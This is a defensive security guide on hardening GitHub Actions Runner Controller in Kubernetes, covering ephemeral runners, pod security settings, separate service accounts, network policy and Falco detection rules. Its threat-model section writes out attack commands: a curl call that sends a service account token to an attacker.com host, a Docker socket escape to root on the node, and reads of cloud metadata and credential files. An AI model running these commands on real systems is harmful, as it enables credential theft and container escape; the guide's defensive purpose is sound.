GitHub Actions Runner Controller Security: Ephemeral Runners and Pod Isolation in Kubernetes
The Problem
GitHub Actions Runner Controller is a Kubernetes operator that watches the GitHub API for queued workflow jobs and provisions runner pods on-demand. Each pod registers with GitHub as a self-hosted runner, receives job assignments, executes the workflow steps defined in the repository’s .github/workflows/ files, reports results back, and is — in the default installation — left running to accept the next job. That last part is the critical failure.
CI code is arbitrary. Any developer with permission to open a pull request can insert workflow steps that execute on the runner pod. Any dependency — a Node package, a Go module, a PyPI library — that is fetched and executed during the build also runs on the runner pod. When that pod lives in your Kubernetes cluster, the threat surface extends well beyond the CI pipeline:
What ARC actually creates: An AutoscalingRunnerSet instructs the ARC controller to create runner pods in a specified namespace. The controller is a Kubernetes Deployment that holds a service account with the RBAC permissions needed to create and delete pods, manage secrets, and coordinate runner registration. The runner pods it creates are regular Kubernetes pods in your cluster. They share the kernel with every other pod on the same node. They can reach any endpoint that the cluster’s network policy permits.
The persistent runner problem: By default, ARC runner pods are not ephemeral. After completing a job, the runner re-registers with GitHub and waits for the next assignment. A malicious workflow step that writes a backdoor to the runner’s filesystem, installs a cron job inside the container, or modifies the runner binary affects every subsequent job on that pod. Worse: the runner’s work directory retains artifacts from previous jobs. A workflow that reads ./_work/ may access environment variables, credentials, or code artifacts belonging to a different workflow that ran before it on the same pod.
The service account inheritance problem: The ARC controller service account requires substantial Kubernetes API access — it needs to create and delete pods, read and write secrets for GitHub registration tokens, and manage the runner lifecycle. When this service account is assigned to runner pods (which happens when the AutoscalingRunnerSet is misconfigured or uses default values), a workflow step can read /var/run/secrets/kubernetes.io/serviceaccount/token and make API calls against the Kubernetes control plane with whatever permissions the controller service account holds.
The concrete attack paths:
A developer on your team opens a PR containing a build step that runs curl -s http://$(cat /var/run/secrets/kubernetes.io/serviceaccount/token | jq -r .sub).attacker.com/$(cat /var/run/secrets/kubernetes.io/serviceaccount/token). The GitHub Actions workflow triggers on pull request. The runner pod executes this step. If the pod has a service account token mounted, the token is exfiltrated before the PR is reviewed or merged. The attacker now has a Kubernetes API token — depending on the controller’s RBAC, this may provide pod creation, secret read access, or cluster-admin equivalent. The PR can be closed immediately; the token is already gone.
A different attack path: the ARC runner pod is configured with a mounted Docker socket for builds that require Docker. A workflow step runs docker run --privileged --pid=host --net=host -v /:/host alpine chroot /host sh — standard Docker socket escape. The workflow now has root on the Kubernetes node. From the node, it can read the kubelet’s credentials, access secrets mounted into other pods via the host filesystem at /var/lib/kubelet/pods/, and potentially pivot to the control plane.
A third path: the runner is not ephemeral. A previous job on this runner ran a deployment workflow that mounted AWS_DEPLOY_ROLE_ARN as an environment variable. The environment variable is gone — but shell history, cached AWS CLI credentials under ~/.aws/, and any artifacts written to the work directory remain. The next job, triggered by a different workflow, can read ~/.aws/credentials and exfiltrate production cloud access.
None of these require an external attacker. Any developer with PR access can execute these paths. The Kubernetes cluster running your CI pipeline is an attractive target precisely because CI pipelines routinely hold credentials to everywhere else: registries, cloud environments, secret managers, other clusters.
Threat Model
- Node credential access via /proc: A runner pod without seccomp restrictions can read
/proc/<kubelet-pid>/environ. The kubelet process environment contains configuration that may include bootstrap tokens or endpoint credentials. With node-level access, enumeration of secret material mounted into other pods becomes straightforward via the host filesystem. - Docker socket escape: An ARC configuration that mounts
/var/run/docker.sockto support Docker-in-Docker gives any workflow step host-level access. Adocker run --privilegedcall from within the runner escapes the pod boundary entirely. - Service account token abuse: Runner pods that inherit the ARC controller’s service account, or any service account with meaningful RBAC, expose Kubernetes API access to every workflow step. The token is auto-mounted at a predictable path and readable by any process in the pod.
- Cross-job secret leakage on persistent runners: A non-ephemeral runner retains filesystem state between jobs. Cloud CLI credential caches, shell history, git credentials, and work-directory artifacts from one job are readable by subsequent jobs — potentially from different repositories or teams if the runner is shared.
- ARC controller RBAC over-grant: The controller requires cluster-scoped RBAC to manage pods and secrets. If that RBAC is applied to runner pods instead of only to the controller, any compromised workflow can enumerate and access cluster resources at the controller’s privilege level.
Hardening Configuration
1. Ephemeral Runners: One Pod Per Job
The most important configuration is also the simplest: configure runners as ephemeral. An ephemeral runner registers with GitHub, executes exactly one job, deregisters, and terminates. The pod is deleted. The next job gets a new pod with a clean filesystem, no residual credentials, and no history from previous jobs.
ARC’s AutoscalingRunnerSet resource controls this. The minRunners: 0 and maxRunners combination allows scale-to-zero. The runner image handles ephemeral behaviour via the RUNNER_EPHEMERAL environment variable — the runner process calls GitHub’s runner deregistration API after the job completes, then exits, which causes the pod to reach Completed state and be garbage collected by ARC.
apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
name: arc-runner-set
namespace: arc-runners
spec:
githubConfigUrl: "https://github.com/myorg"
githubConfigSecret: arc-github-secret
# Scale to zero when no jobs are queued
minRunners: 0
maxRunners: 10
template:
spec:
containers:
- name: runner
image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
env:
- name: RUNNER_EPHEMERAL
value: "true"
# Explicit: runner exits after one job
# ARC detects the completed pod and deletes it
# Next job queued → new pod created from clean image
Pinning the runner image to a digest rather than a tag applies the same supply-chain reasoning as SHA-pinning actions: the image pulled for each pod is cryptographically fixed to a specific layer set. A new runner image release does not automatically reach your pods until you update the digest reference and redeploy.
The trade-off is cold-start latency. Pod scheduling, image pull (if not cached on the node), and runner registration with GitHub’s API takes 30–60 seconds. For repositories where CI jobs are infrequent or where latency is acceptable, this is the correct trade-off. For repositories with very high job throughput, pre-warming a small pool (minRunners: 2) reduces median latency, but those pre-warmed runners should still be ephemeral — they register as ephemeral runners, execute one job, and are replaced by ARC before accepting another.
2. Runner Pod Security Standards
Runner pods need to write to their workspace — readOnlyRootFilesystem: true breaks most CI use cases because workflow steps write temporary files, install tools into the runner’s PATH, and populate the work directory. Everything else should be locked down.
apiVersion: actions.github.com/v1alpha1
kind: AutoscalingRunnerSet
metadata:
name: arc-runner-set
namespace: arc-runners
spec:
githubConfigUrl: "https://github.com/myorg"
githubConfigSecret: arc-github-secret
minRunners: 0
maxRunners: 10
template:
metadata:
labels:
app: arc-runner
# Label used by NetworkPolicy and Falco selectors
spec:
# No host-level namespace sharing
hostPID: false
hostIPC: false
hostNetwork: false
# Runners do not need Kubernetes API access
automountServiceAccountToken: false
securityContext:
runAsNonRoot: true
runAsUser: 1001 # The 'runner' user in the actions-runner image
runAsGroup: 1001
fsGroup: 1001
seccompProfile:
type: RuntimeDefault
# RuntimeDefault seccomp blocks ~40 syscalls the runner never needs,
# including ptrace (used in process injection), mount (used in
# container escape attempts), and kexec_load.
containers:
- name: runner
image: ghcr.io/actions/actions-runner:2.315.0@sha256:3e9b3a9e8f4b2c1d7a6f5e0b9c8d7a4f3e2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d
env:
- name: RUNNER_EPHEMERAL
value: "true"
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: false # Required: runner writes to /home/runner
capabilities:
drop: ["ALL"]
# No capabilities added back — runner doesn't need NET_ADMIN,
# SYS_PTRACE, SYS_ADMIN, or anything else from the default set
resources:
requests:
cpu: "500m"
memory: "512Mi"
limits:
cpu: "2"
memory: "4Gi"
volumeMounts:
- name: work
mountPath: /home/runner/_work
# No hostPath mounts
# No Docker socket mount
volumes:
- name: work
emptyDir: {}
# emptyDir is pod-scoped: created when pod starts, deleted when pod
# terminates. No data persists between jobs.
# No tolerations for tainted nodes unless runners are on dedicated nodes
The automountServiceAccountToken: false line is the most operationally important field after ephemerality. It prevents the Kubernetes API token from appearing at /var/run/secrets/kubernetes.io/serviceaccount/token. A workflow step that calls curl https://kubernetes.default.svc/api/v1/secrets -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" receives a connection refused or empty response rather than a valid credential.
Apply the restricted Pod Security Standard to the arc-runners namespace:
apiVersion: v1
kind: Namespace
metadata:
name: arc-runners
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/audit: restricted
The restricted PSS enforces runAsNonRoot, allowPrivilegeEscalation: false, capabilities.drop: ALL, and requires either RuntimeDefault or a named seccomp profile. ARC pods that do not meet these requirements are rejected at admission. The label applies enforcement to all pods in the namespace, not just runner pods — this also constrains any misconfigured ARC controller component that lands in the wrong namespace.
3. Separate Service Accounts: Controller vs. Runner
The ARC controller service account requires meaningful Kubernetes API access. Runner pods require none. These must be separate accounts, and runner pods must explicitly reference the no-permission account.
# Controller service account — narrow RBAC, stays in arc-system namespace
apiVersion: v1
kind: ServiceAccount
metadata:
name: arc-controller
namespace: arc-system
---
# Runner service account — no token, no RBAC
apiVersion: v1
kind: ServiceAccount
metadata:
name: arc-runner
namespace: arc-runners
automountServiceAccountToken: false
---
# Minimal RBAC for the controller — only what ARC actually needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: arc-controller
namespace: arc-runners
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "watch", "create", "update", "delete"]
# Secrets access is scoped to arc-runners namespace only
- apiGroups: ["actions.github.com"]
resources: ["ephemeralrunners", "ephemeralrunnersets"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: arc-controller
namespace: arc-runners
subjects:
- kind: ServiceAccount
name: arc-controller
namespace: arc-system
roleRef:
kind: Role
name: arc-controller
apiGroup: rbac.authorization.k8s.io
In the AutoscalingRunnerSet, explicitly reference the runner service account:
spec:
template:
spec:
serviceAccountName: arc-runner
automountServiceAccountToken: false
# Both fields: serviceAccountName prevents inheriting the default SA,
# automountServiceAccountToken: false prevents token mounting even if
# the SA has tokens defined.
The default service account in any namespace has no RBAC, but it does have a token auto-mounted unless the namespace default is changed. Setting both fields eliminates the auto-mount regardless of namespace-level defaults.
4. Network Policy: Isolate Runner Pods from Internal Cluster Services
Runner pods have legitimate network needs: they must reach api.github.com to register and report job results, objects.githubusercontent.com and pipelines.actions.githubusercontent.com to download action code and receive job payloads, and any container registry your workflows pull from. They do not need to reach the Kubernetes API server, etcd, internal cluster services, or the cloud instance metadata endpoint (IMDS).
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: arc-runner-isolation
namespace: arc-runners
spec:
podSelector:
matchLabels:
app: arc-runner
policyTypes:
- Ingress
- Egress
# No ingress: runners initiate outbound connections only.
# GitHub pushes job assignments via a long-poll from the runner process —
# no inbound connections required.
ingress: []
egress:
# DNS: required for GitHub hostname resolution
- to:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: kube-system
ports:
- port: 53
protocol: UDP
- port: 53
protocol: TCP
# HTTPS: GitHub API and Actions infrastructure
# In environments with an egress proxy, restrict to the proxy IP instead
- ports:
- port: 443
protocol: TCP
to:
- ipBlock:
cidr: 0.0.0.0/0
except:
# Block cloud IMDS endpoints — no runner needs instance metadata
- 169.254.169.254/32 # AWS / Azure IMDS
- 169.254.170.2/32 # ECS task metadata
# Block Kubernetes API server — runners don't need cluster API access
# Replace with your actual API server CIDR
- 10.96.0.1/32 # kubernetes.default.svc ClusterIP (typical)
# Block internal pod CIDRs — runners shouldn't reach other pods
- 10.244.0.0/16 # Pod CIDR (adjust to your cluster's pod CIDR)
- 10.96.0.0/12 # Service CIDR (adjust to your cluster's service CIDR)
The IMDS block is particularly important in cloud environments. AWS, Azure, and GCP instance metadata services are reachable at link-local addresses from any pod on the node unless explicitly blocked. A workflow step that curls http://169.254.169.254/latest/meta-data/iam/security-credentials/ retrieves the node’s attached IAM role credentials without any authentication. In EKS clusters, this is how a compromised runner pod can obtain IAM credentials scoped to the node’s instance profile — potentially with permissions far beyond what the CI pipeline needs.
The NetworkPolicy requires a CNI plugin that enforces it: Calico, Cilium, Weave Net, or similar. The default Kubernetes networking does not enforce NetworkPolicy objects. Verify enforcement is active before relying on this control:
# Create a test pod in arc-runners, attempt to reach the API server
kubectl run netpol-test \
--image=alpine --restart=Never \
--namespace=arc-runners \
--labels="app=arc-runner" \
-- sh -c "wget -qO- https://kubernetes.default.svc/api/v1 && echo REACHABLE || echo BLOCKED"
# Expected output with enforcement: BLOCKED (connection refused or timeout)
# Output without enforcement: REACHABLE (returns JSON API response)
5. Build Container Images Without the Docker Socket
The most common justification for mounting the Docker socket into runner pods is image builds. The Docker socket mount is a host-escape vector. The alternative is daemonless image building tools that run entirely in userspace within the container.
Kaniko builds Docker images from a Dockerfile without requiring daemon access or elevated privileges:
# .github/workflows/build.yml
jobs:
build:
runs-on: arc-runner-set
steps:
- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
- name: Build and push with Kaniko
run: |
/kaniko/executor \
--dockerfile="${GITHUB_WORKSPACE}/Dockerfile" \
--context="dir://${GITHUB_WORKSPACE}" \
--destination="${REGISTRY}/${IMAGE_NAME}:${GITHUB_SHA}" \
--cache=true \
--cache-repo="${REGISTRY}/${IMAGE_NAME}/cache"
env:
REGISTRY: ghcr.io/myorg
IMAGE_NAME: myapp
For Kaniko to be available in the runner pod, either use a runner image that includes the Kaniko executor, or use ARC’s container mode where the Kaniko step runs in a sidecar container:
# AutoscalingRunnerSet with Kaniko as an init container or sidecar
spec:
template:
spec:
initContainers:
- name: kaniko-setup
image: gcr.io/kaniko-project/executor:v1.21.0@sha256:...
command: ["cp", "/kaniko/executor", "/shared/kaniko"]
volumeMounts:
- name: shared-tools
mountPath: /shared
containers:
- name: runner
# ... runner config ...
volumeMounts:
- name: shared-tools
mountPath: /usr/local/bin
# Kaniko executor available as /usr/local/bin/kaniko
volumes:
- name: shared-tools
emptyDir: {}
Buildah is an alternative that also supports rootless operation. Both tools write to OCI-compliant registries directly, skipping the Docker daemon entirely. Neither requires --privileged, neither requires host filesystem mounts, and neither provides an escape path from the runner pod boundary.
6. Detect Suspicious Runner Activity with Falco
Runtime detection provides a second line of defence when a misconfiguration slips through or when a new attack technique bypasses preventive controls. Falco runs as a DaemonSet and monitors syscall activity from every pod on the node.
# falco-rules-arc.yaml — deploy via ConfigMap into Falco's rules directory
customRules:
arc-runner-rules.yaml: |-
# Runner reads host-level credential paths
- rule: ARC runner accessing host credential paths
desc: >
A GitHub Actions runner pod is reading paths associated with
node-level credentials. This may indicate an attempt to read
kubelet credentials or other node secret material.
condition: >
container.label.app = "arc-runner" and
open_read and
(fd.name startswith "/proc/" or
fd.name startswith "/var/lib/kubelet/" or
fd.name startswith "/etc/kubernetes/" or
fd.name contains "/serviceaccount/token")
output: >
ARC runner reading host credential path
(pod=%k8s.pod.name ns=%k8s.ns.name path=%fd.name
user=%user.name cmd=%proc.cmdline)
priority: CRITICAL
tags: [arc, runner, credential-access]
# Runner executes kubectl — API server contact attempt
- rule: ARC runner executing kubectl
desc: >
kubectl execution inside a runner pod indicates an attempt to
interact with the Kubernetes API. Runners should have no cluster
API access; this is anomalous in all cases.
condition: >
container.label.app = "arc-runner" and
spawned_process and
(proc.name = "kubectl" or
proc.name = "helm" or
proc.name = "k9s" or
proc.name = "kustomize")
output: >
Kubernetes tooling executed in ARC runner pod
(pod=%k8s.pod.name cmd=%proc.cmdline user=%user.name)
priority: WARNING
tags: [arc, runner, lateral-movement]
# Runner spawns shell from non-runner parent — post-compromise persistence
- rule: ARC runner unexpected shell spawn
desc: >
A shell process is spawned with an unexpected parent process inside
a runner pod. The runner process legitimately spawns shells to execute
workflow steps; a shell spawned from curl, wget, or python suggests
code execution from a fetched payload.
condition: >
container.label.app = "arc-runner" and
spawned_process and
proc.name in (shell_binaries) and
proc.pname in (curl, wget, python, python3, node, ruby) and
not proc.pname = "Runner.Worker"
output: >
Unexpected shell spawn in ARC runner pod
(pod=%k8s.pod.name shell=%proc.name parent=%proc.pname
cmd=%proc.cmdline)
priority: HIGH
tags: [arc, runner, execution]
# Runner attempts outbound connection to non-standard port
- rule: ARC runner non-HTTPS outbound connection
desc: >
A runner pod is initiating a network connection on a port other
than 443 or 53. Legitimate runner activity (GitHub API, registry
pulls, package downloads) uses HTTPS. Non-443 outbound connections
from runner pods warrant investigation.
condition: >
container.label.app = "arc-runner" and
outbound and
fd.sport != 443 and
fd.sport != 53 and
fd.sport != 80
output: >
ARC runner non-standard outbound connection
(pod=%k8s.pod.name dstip=%fd.rip dstport=%fd.rport
cmd=%proc.cmdline)
priority: NOTICE
tags: [arc, runner, network]
Deploy Falco in kernel module or eBPF mode. The rules above use label selectors (container.label.app = "arc-runner") to scope detection to runner pods without generating noise from other workloads. Alert the CRITICAL and HIGH priority rules to your incident response channel; route WARNING and NOTICE to a monitoring queue for daily review.
Expected Behaviour
Watching the runner pod lifecycle with kubectl get pods -n arc-runners -w for an ephemeral runner set:
NAME READY STATUS RESTARTS AGE
arc-runner-set-rg9k4-runner 0/1 Pending 0 0s
arc-runner-set-rg9k4-runner 0/1 Init:0/1 0 2s
arc-runner-set-rg9k4-runner 1/1 Running 0 8s
# Job executes for ~45 seconds
arc-runner-set-rg9k4-runner 0/1 Completed 0 53s
arc-runner-set-rg9k4-runner 0/1 Terminating 0 54s
# Pod deleted; next job queued → new pod with new name
arc-runner-set-rg9k5-runner 0/1 Pending 0 61s
Each pod name includes a random suffix: rg9k4, rg9k5. Each start from a clean image pull. The emptyDir volume that held the previous job’s workspace is gone with the pod.
A workflow step that attempts to reach the Kubernetes API server from a runner pod with the network policy applied:
# Inside a workflow step:
curl -sk https://kubernetes.default.svc/api/v1/namespaces \
-H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo 'no-token')"
# Result with automountServiceAccountToken: false and NetworkPolicy enforced:
# cat: /run/secrets/kubernetes.io/serviceaccount/token: No such file or directory
# curl: (6) Could not resolve host: kubernetes.default.svc
# (or connection timeout, depending on CNI implementation)
A workflow step that runs cat /proc/1/environ triggers the Falco rule ARC runner accessing host credential paths within milliseconds. The alert appears in your SIEM or alerting channel. The workflow step itself still completes — Falco is a detection tool, not an enforcement tool unless paired with a kill signal configured in falco.yaml. For enforcement, pair with a Kubernetes admission webhook that blocks the pod if it attempts to modify its own seccomp profile, or with Tetragon which can terminate the process directly.
Trade-offs
Ephemeral runner cold-start latency: Pod scheduling, image pull, and GitHub runner registration takes 30–60 seconds on a warm node with a cached image. For repositories where jobs queue frequently, this latency is the primary operational complaint. Mitigations: pre-pull the runner image via a DaemonSet on dedicated runner nodes, use minRunners: 2 for a standing pool of ephemeral runners (they each register and wait for exactly one job before terminating), and place runner nodes in the same availability zone as the scheduler. The latency is a fixed cost. The alternative — persistent runners — trades 45 seconds of startup time for the entire attack surface described above.
No Docker socket, no easy Docker builds: Some CI workflows have hard dependencies on Docker daemon features: multi-platform builds via docker buildx, BuildKit cache mounts, or legacy docker-compose test setups. Kaniko covers the common case (Dockerfile to registry) but does not support all BuildKit features. Buildah covers more of the OCI build surface. For multi-platform builds, Kaniko supports --custom-platform; for cache mounts, the runner pod can be configured with a persistent volume claim for the Kaniko layer cache rather than using BuildKit’s cache mount syntax. The migration cost is real but bounded — most CI image builds reduce to FROM, COPY, RUN, CMD and work unchanged with Kaniko.
readOnlyRootFilesystem: false: Most container security guidance recommends readOnlyRootFilesystem: true. Runner pods cannot function with this set — workflow steps install tools, write temporary files, and populate the work directory under /home/runner/. This is a legitimate exception driven by the runner’s operational requirements. The compensating controls are: runAsNonRoot: true (the runner user cannot write to paths owned by root), capabilities: drop: ALL (the runner user cannot escalate or change file ownership), and the emptyDir workspace that is destroyed with the pod.
NetworkPolicy except blocks are fragile: The ipBlock.except syntax requires knowing your API server’s ClusterIP, pod CIDR, and service CIDR. These values differ between clusters and may change if the cluster is rebuilt. A more robust approach for clusters with Cilium: use CiliumNetworkPolicy with toFQDN rules that explicitly name the allowed GitHub endpoints rather than using IP block exceptions. This is more maintainable and more precise, but introduces a Cilium dependency.
Failure Modes
Persistent runners left as the default: The ARC Helm chart defaults and quick-start documentation focus on getting runners working, not on making them ephemeral. Teams that deploy ARC from the default chart without setting RUNNER_EPHEMERAL: "true" run persistent runners indefinitely. A malicious workflow step that writes to ~/.bashrc, installs a cron job inside the container, or modifies /home/runner/run.sh persists across jobs until the pod is manually deleted or the node is recycled. Ephemeral runners should be treated as a deployment prerequisite, not an optional optimisation.
Inheriting the controller service account: If the AutoscalingRunnerSet does not specify serviceAccountName: arc-runner in its pod template, Kubernetes assigns the default service account of the arc-runners namespace. If the arc-system namespace and arc-runners namespace are the same (a common shortcut in quick-start deployments), the runner pods may inherit the controller’s service account. The controller’s service account has permission to create pods, read secrets, and manage runners — exactly the permissions a compromised runner needs to escalate within the cluster. Verify: kubectl get pods -n arc-runners -o jsonpath='{.items[*].spec.serviceAccountName}' should return arc-runner (the restricted account), not arc-controller or default.
NetworkPolicy without CNI enforcement: Creating a NetworkPolicy object in a cluster running a CNI plugin that does not enforce it produces no security effect whatsoever. The object is accepted by the API server and stored in etcd but never applied to iptables or eBPF rules. Flannel in its default configuration, for example, does not enforce NetworkPolicy. Calico, Cilium, and Weave Net do. Before relying on the network policy controls in this article, verify that your CNI enforces them: deploy a test pod with the runner labels and attempt to connect to the Kubernetes API server. If the connection succeeds, enforcement is not active.
Docker socket mount “just for one step”: The Docker socket mount is often added incrementally. A workflow needs to build an image; the platform engineer adds the socket mount “temporarily”; the runner pod becomes a permanent host-escape vector. There is no safe scoping of a Docker socket mount — any workflow step on that runner, not just the one that needs Docker, can use the socket. The correct solution is Kaniko or Buildah, not a scoped mount. If the Docker socket is present in any runner pod configuration, assume that any workflow on that runner has node-level access.
Falco rules with wrong label selectors: The Falco rules above select pods by container.label.app = "arc-runner". If the AutoscalingRunnerSet pod template does not include this label, the rules match nothing. After deploying the rules, verify with a test: run a workflow step that executes cat /proc/1/cmdline and confirm the Falco alert fires. Silence is not safety; silence may mean the rule selector does not match your runner pods.